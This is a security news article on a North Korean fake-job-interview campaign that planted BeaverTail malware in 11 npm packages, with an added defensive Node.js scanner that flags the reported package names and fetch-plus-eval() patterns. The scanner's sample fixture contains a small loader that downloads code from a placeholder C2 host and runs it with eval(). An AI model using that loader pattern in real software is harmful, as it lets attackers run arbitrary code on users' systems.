Hackers Target Developers Using Fake Job Interviews
North Korean hackers are spreading dangerous malware called BeaverTail. They use a sneaky trick — pretending to offer job interviews to software developers. This method is called the “Contagious Interview” campaign.
The hackers have now reached the npm ecosystem. Npm is a popular website where developers download code packages. These packages help them build software faster and easier. But some of the packages are fake. They look useful but contain hidden malware. When developers install them, their computers get infected.
The hackers made and uploaded 11 fake packages on npm. These looked like helpful tools for developers. Some had names like twitterapis, core-pino, and debugger-vite. People downloaded these packages over 5,600 times before they were removed. Once installed, the packages infected computers with malware. This malware could steal data, spy on users, and control systems from far away.
The attackers designed the attack to fool software developers during what looks like a job hiring process. They lure victims into opening these malicious packages by using interview-related names or code directories, like “eiwork_hire,” which hint at employment. This trick allows the hackers to silently break into the developer’s system.
Malicious Code Hides Behind Fake Tools
Hackers disguised the 11 harmful npm packages as tools or debuggers. These looked like normal tools that programmers use. They linked some packages, like events-utils and icloud-cod, to Bitbucket. Bitbucket is a less popular code site than GitHub. This made the packages look more real. It also helped the hackers avoid quick detection.
Behind the scenes, these packages hid dangerous code. This code worked like a remote access trojan (RAT). A RAT lets hackers control infected computers from far away. The bad packages could download and run more code from the internet. They used a JavaScript function called eval() to do this. This method is risky and is often used by hackers.
Once the hackers gained access, they could do almost anything — steal sensitive files, download other malware, or even monitor the victim’s screen. The malware even included a secret Python-based backdoor tool called InvisibleFerret, which helps attackers maintain control over the device for a long time.
Some of the infected packages, such as cln-logger, node-clog, consolidate-log, and consolidate-logger, had slight differences in their code, showing that the hackers were trying out different versions of their malware to improve their success rate. This makes it harder for security systems to detect and block them.
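As an added example (not code from this article or from the researchers it refers to), the Node.js script below checks a project's dependencies against the package names mentioned in this article and flags installed files that combine a network fetch with eval(), the download-and-run behaviour described above. The regex heuristics, the function names and the sample inputs are assumptions constructed for illustration.

```javascript
// Package names listed in this article (9 of the 11 reported packages).
const REPORTED_NAMES = new Set([
  "twitterapis", "core-pino", "debugger-vite", "events-utils", "icloud-cod",
  "cln-logger", "node-clog", "consolidate-log", "consolidate-logger",
]);

// Heuristics chosen for this example (assumptions, not published signatures).
const EXEC_SINK = /\beval\s*\(|\bnew\s+Function\s*\(/;
const NET_SOURCE =
  /\brequire\s*\(\s*["'](?:https?|axios|node-fetch)["']\s*\)|\bfetch\s*\(/;

// Drop comments so a mention of eval() in documentation is not flagged.
// The [^:] guard keeps "https://" URLs inside string literals intact.
function stripComments(src) {
  return src.replace(/\/\*[\s\S]*?\*\//g, "").replace(/(^|[^:])\/\/.*$/gm, "$1");
}

// manifest: parsed package.json; files: { path: sourceText } of installed code.
function auditProject(manifest, files) {
  const findings = [];
  const deps = { ...manifest.dependencies, ...manifest.devDependencies };
  for (const name of Object.keys(deps)) {
    if (REPORTED_NAMES.has(name)) findings.push({ type: "reported-package", where: name });
  }
  for (const [path, src] of Object.entries(files)) {
    const code = stripComments(src);
    const exec = EXEC_SINK.test(code);
    if (exec && NET_SOURCE.test(code)) {
      findings.push({ type: "remote-code-loader", where: path }); // fetch + eval together
    } else if (exec) {
      findings.push({ type: "dynamic-exec", where: path }); // review manually
    }
  }
  return findings;
}

// Constructed sample input (not taken from the real packages).
const sampleManifest = { dependencies: { express: "^4.19.0", "core-pino": "1.0.0" } };
const sampleFiles = {
  "node_modules/core-pino/index.js":
    'const https = require("https");\n' +
    'https.get("https://c2.example.invalid/p", (r) => {\n' +
    '  let b = ""; r.on("data", (d) => (b += d)); r.on("end", () => eval(b));\n' +
    "});\n",
  "node_modules/express/lib/util.js":
    "// never call eval() on request data\nmodule.exports = (m) => String(m);\n",
};

console.log(auditProject(sampleManifest, sampleFiles));
```

A name match is the stronger signal; the pattern match is a heuristic that obfuscated code can evade, so an empty result does not prove a package is safe.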
BeaverTail and Tropidoor: A New Malware Duo
Security researchers have seen the main malware, BeaverTail, before. But now, they found it spreading in new and smarter ways. This includes using npm packages. BeaverTail can steal information. It can also launch another harmful program called Tropidoor. Tropidoor is a new Windows backdoor. It has not been seen before. It gives hackers even more control over infected computers.
Recently, security experts in South Korea found a similar attack. In this case, hackers used a fake job interview to trick people again. They sent phishing messages with BeaverTail malware hidden inside. This attack mainly targeted developers in South Korea. The goal was to steal private data and financial information.
Some of the malicious servers used by the hackers are no longer active. But the infected code was made to fetch new data from those servers. This means the hackers could send any malware to infected computers at any time. That makes this threat very dangerous.
This new wave of attacks proves how skilled and determined these hackers are. By hiding malware in tools that developers trust and use every day, they are able to quietly invade software supply chains, one line of code at a time. This campaign shows that even a simple-looking package on npm could hide something sinister, especially when combined with clever tricks like fake job offers.